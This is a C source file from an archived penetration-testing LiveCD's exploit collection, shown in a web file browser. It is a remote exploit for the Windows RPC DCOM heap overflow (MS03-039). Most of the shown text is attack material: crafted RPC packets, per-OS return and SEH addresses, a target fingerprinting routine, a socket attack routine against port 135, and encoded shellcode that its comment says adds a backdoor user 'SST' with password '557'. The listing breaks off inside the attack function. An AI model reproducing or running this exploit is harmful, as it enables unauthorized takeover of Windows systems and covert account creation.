home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / MS-DCOM-Uni.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  23KB  |  579 lines
  1. /* Microsoft Windows RPC2 (Universal) Remote Exploit (MS03-039) */
  2.  
  3.  
  4. #include <stdio.h> 
  5. #include <winsock2.h> 
  6. #include <windows.h> 
  7. #include <process.h> 
  8. #include <string.h> 
  9. #include <winbase.h> 
  10.  
  11. FILE *fp1; 
  12. unsigned char bindstr[]={ 
  13. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 
  14. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 
  15. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 
  16. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 
  17. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; 
  18.  
  19. unsigned char request1[]={ 
  20. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 
  21. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 
  22. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 
  23. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 
  24. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E 
  25. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D 
  26. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 
  27. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 
  28. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 
  29. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 
  30. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 
  31. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 
  32. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 
  33. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 
  34. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  35. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 
  36. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 
  37. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 
  38. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 
  39. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 
  40. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 
  41. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 
  42. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 
  43. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 
  44. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 
  45. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 
  46. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF 
  47. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  48. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  49. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  50. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  51. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 
  52. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 
  53. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 
  54. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 
  55. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 
  56. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 
  57. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 
  58. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  59. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 
  60. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 
  61. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 
  62. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 
  63. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E 
  64. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 
  65. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  66. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 
  67. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 
  68. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  69. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 
  70. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 
  71. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  72. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 
  73. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 
  74. ,0x00,0x00,0x00,0x00,0x00,0x00}; 
  75.  
  76. unsigned char request2[]={ 
  77. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 
  78. ,0x00,0x00,0x5C,0x00,0x5C,0x00}; 
  79.  
  80. unsigned char request3[]={ 
  81. 0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00, 
  82. 0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 
  83. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 
  84. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 
  85. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; 
  86.  
  87.  
  88. unsigned char request4[]={ 
  89. 0x01,0x10 
  90. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 
  91. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C 
  92. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  93. }; 
  94. void XOR(unsigned char *buf,int offset,int lenght,unsigned char mask) 
  96.      for(int i=offset;i<(offset+lenght);i++) 
  97.           buf=buf^mask; 
  99. DWORD GETSTRCS(char *buf) 
  101.      DWORD cs=0; 
  102.      bool cld=false; 
  103.      for(unsigned int i=0;i<strlen(buf);i++) 
  104.      { 
  105.           for(int z=0;z<13;z++) 
  106.           { 
  107.           if(cs&1) cld=true; 
  108.           cs=cs>>1; 
  109.           if(cld) cs=cs|0x80000000; 
  110.           cld=false; 
  111.           } 
  112.           cs+=buf; 
  113.      } 
  114.      return cs; 
  116.  
  117. struct { 
  118.      DWORD seh; 
  119.      DWORD jmp; 
  120.      DWORD heap; 
  121.      char target[200]; 
  122. } target_os[]= 
  124.      { 
  125.           0x005Bfd2c, 
  126.           0x00081eeb, 
  127.           0x00180000, 
  128.           "WinXP" 
  129.      }, 
  130.      { 
  131.           0x0095fd3c, 
  132.           0x00081eeb, 
  133.           0x00170000, 
  134.           "Win2K" 
  135.      } 
  136. },v; 
  137. unsigned char rawData1[]= 
  138.     "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00" 
  139.     "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00" 
  140.  
  141.     "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e" 
  142.     "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01" 
  143.     "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30" 
  144.     "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2"     
  145.  
  146. //SHELLCODE From SAM ,THANKs ! 
  147. //Add user SST,password is 557, 
  148. "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA" 
  149. "\xEB\x05\xE8\xEB\xFF\xFF\xFF" 
  150.  
  151. "\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D" 
  152. "\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C" 
  153. "\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99" 
  154. "\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9" 
  155. "\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6" 
  156. "\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED" 
  157. "\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE" 
  158. "\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12" 
  159. "\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED" 
  160. "\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA" 
  161. "\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB" 
  162. "\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66" 
  163. "\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81" 
  164. "\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A" 
  165. "\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3" 
  166. "\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78" 
  167. "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D" 
  168. "\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99" 
  169. "\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12" 
  170. "\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99" 
  171. "\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66" 
  172.  
  173.     "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce" 
  174.     "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6" 
  175.     "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7" 
  176.     "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4" 
  177.     "\x7f\x19\x95\xd5\x17\x53\xe6\x6a" 
  178.     "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca" 
  179.     "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90"     // 
  180.     "\x90\x90\x90\x90\x90\x90\x90\x90" 
  181.     "\x77\xe0\x43\x00\x00\x10\x5c\x00" 
  182.     "\xeb\x1e\x01\x00"//     FOR CN SP3/SP4+-MS03-26 
  183.     "\x4C\x14\xec\x77"//    TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os 
  184.  
  185.  
  186. //FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my artic 
  187. //"Utilization of released heap structure and exploit of universal Heap overflow in windows ". 
  188. "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA" 
  189. "\xEB\x05\xE8\xEB\xFF\xFF\xFF" 
  190. "\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14" 
  191. "\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA" 
  192. "\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF" 
  193. "\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99" 
  194. "\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1" 
  195. "\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7" 
  196. "\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99" 
  197. "\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA" 
  198. "\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9" 
  199. "\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1" 
  200. "\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8" 
  201. "\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99" 
  202. "\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9" 
  203. "\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99" 
  204. "\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12" 
  205. "\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98" 
  206. "\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99" 
  207. "\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12" 
  208. "\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12" 
  209. "\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA" 
  210. "\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD" 
  211. "\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A" 
  212. "\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2" 
  213. "\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12" 
  214. "\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31" 
  215. "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66" 
  216.  
  217. "\x04\x04\x00\x70\x00\x04\x40" 
  218. "\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00" 
  219.  
  220. "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71"; 
  221.  
  222.  
  223. int version(char ip[16], int sock) 
  225. //un poco de ettercap... 
  226.  
  227.  
  228. unsigned char peer0_0[] = { 
  229. 0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 
  230. 0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18, 
  231. 0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00, 
  232. 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 
  233. 0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11, 
  234. 0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57, 
  235. 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 
  236. 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 
  237. 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 
  238. 0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00, 
  239. 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 
  240. 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, 
  241. 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 
  242. 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 
  243. 0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00, 
  244. 0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41, 
  245. 0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d, 
  246. 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 
  247. 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 
  248. 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 
  249. 0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97, 
  250. 0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0, 
  251. 0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00, 
  252. 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 
  253. 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 
  254. 0x02, 0x00, 0x00, 0x00 }; 
  255.  
  256.  
  257. unsigned char peer0_1[] = { 
  258. 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 
  259. 0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 
  260. 0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
  261. 0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 
  262. 0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20, 
  263. 0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53, 
  264. 0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00, 
  265. 0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11, 
  266. 0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb, 
  267. 0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 
  268. 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 
  269. 0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00, 
  270. 0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00, 
  271. 0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00, 
  272. 0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00, 
  273. 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 
  274. 0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 
  275. 0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00, 
  276. 0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  277. 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 
  278. 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
  279. 0x07, 0x00 }; 
  280.  
  281. /* 
  282.  
  283. unsigned char win2kvuln[] = { 
  284. 0x04, 0x00, 0x00, 0x00, 
  285. 0x00, 0x00, 0x00, 0x00, 
  286. 0x04, 0x5d, 0x88, 0x8a, 
  287. 0xeb, 0x1c, 0xc9, 0x11, 
  288. 0x9f, 0xe8, 0x08, 0x00, 
  289. 0x2b, 0x10, 0x48, 0x60, 
  290. 0x02, 0x00, 0x00, 0x00, 
  291. 0x00, 0x00, 0x00, 0x00, 
  292. 0x04, 0x5d, 0x88, 0x8a, 
  293. 0xeb, 0x1c, 0xc9, 0x11, 
  294. 0x9f, 0xe8, 0x08, 0x00, 
  295. 0x2b, 0x10, 0x48, 0x60, 
  296. 0x02, 0x00, 0x00, 0x00}; 
  297. */ 
  298.      fd_set fds2; 
  299.      unsigned char buf[1024]; 
  300.  
  301.      int l; 
  302.      struct timeval tv2; 
  303.      FD_ZERO(&fds2); 
  304.      FD_SET(sock, &fds2); 
  305.      tv2.tv_sec = 6; 
  306.      tv2.tv_usec = 0; 
  307.  
  308.      memset(buf,'\0',sizeof(buf)); 
  309.      send(sock,(char *)peer0_0,sizeof(peer0_0),0); 
  310.      if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) 
  311.      { 
  312.           l=recv (sock, (char *)buf, sizeof (buf),0); 
  313. //          for(i=0;i<52;i++) 
  314. //          { 
  315. //               if (i==28)     i=i+4; 
  316. //               if (buf[i+32]!=win2kvuln) 
  317. //               { 
  318.                     send(sock,(const char *)peer0_1,sizeof(peer0_1),0); 
  319.                     if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) 
  320.                     { 
  321.                          memset(buf,'\0',sizeof(buf)); 
  322.                          l=recv (sock, (char *)buf, sizeof (buf),0); 
  323.                          if (l==32) 
  324.                          { 
  325.                               closesocket(sock); 
  326.                               return(1);//winxp 
  327.                          } 
  328.                          else 
  329.                          { 
  330.                           #ifdef WIN32 
  331.                           closesocket(sock); 
  332.                           #else 
  333.                           close(sock); 
  334.                           #endif 
  335.                           return(0);//win2kby default. Nt4 not added.. 
  336.                          } 
  337.                     } 
  338.                     else return(-1); 
  339. //               } 
  340.  
  341.  
  342.           //} 
  343. //          closesocket(sock); 
  344. //          return(0);//win2k 
  345.      } 
  346.      closesocket(sock); 
  347.      return(-1);          //Unknown 
  349. /********************************************************************************/ 
  350. int attack(char *ip1,bool atack) 
  352.      unsigned char rawData[1036]; 
  353.      memcpy(rawData,rawData1,1036); 
  354.      unsigned char shellcode[50000]; 
  355.      char ip[200]; 
  356.      strcpy(ip,ip1); 
  357.     WSADATA WSAData; 
  358.     SOCKET sock; 
  359.     int len,len1; 
  360.     SOCKADDR_IN addr_in; 
  361.     short port=135; 
  362.     unsigned char buf1[50000]; 
  363.     unsigned char buf2[50000]; 
  364.  
  365.      printf("%s\n",ip); 
  366.     //printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n"); 
  367.     //printf("Code by FlashSky,Flashsky xfocus org\n"); 
  368.     //printf("Welcome to our Site: http://www.xfocus.org\n"); 
  369.     //printf("Welcome to our Site: http://www.venustech.com.cn\n"); 
  370. /*    if(argc!=3) 
  371.     { 
  372.           printf("%s targetIP targetOS\ntargets:\n",argv[0]); 
  373.           for(int i=0;i<sizeof(target_os)/sizeof(v);i++) 
  374.                printf("%d - %s\n",i,target_os.target); 
  375.                printf("\n%x\n",GETSTRCS(argv[1])); 
  376.           return; 
  377.     } 
  378. */ 
  379. /*    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) 
  380.     { 
  381.         printf("WSAStartup error.Error:%d\n",WSAGetLastError()); 
  382.         return; 
  383.     } 
  384. */ 
  385.     addr_in.sin_family=AF_INET; 
  386.     addr_in.sin_port=htons(port); 
  387.     addr_in.sin_addr.S_un.S_addr=inet_addr(ip); 
  388.      
  389.     if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) 
  390.     { 
  391.         printf("Socket failed.Error:%d\n",WSAGetLastError()); 
  392.         return 0; 
  393.     } 
  394.     len1=sizeof(request1); 
  395.  
  396.     len=sizeof(rawData); 
  397.  
  398.     if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) 
  399.     { 
  400.         printf("%s - connect failed\n",ip); 
  401.         return 0; 
  402.     } 
  403.  
  404.      int vers=!version(ip,sock); 
  405.  
  406. //     printf("%d\n",vers); 
  407. //     return; 
  408. //     int vers=1; 
  409.  
  410.      FILE *fp; 
  411.  
  412.      //τ¿Γ Ñ¼ » ¬ÑΓ 
  413. //     fp=fopen("shellcode","rb"); 
  414. //     fread(rawData,1,1036,fp); 
  415. //     fclose(fp); 
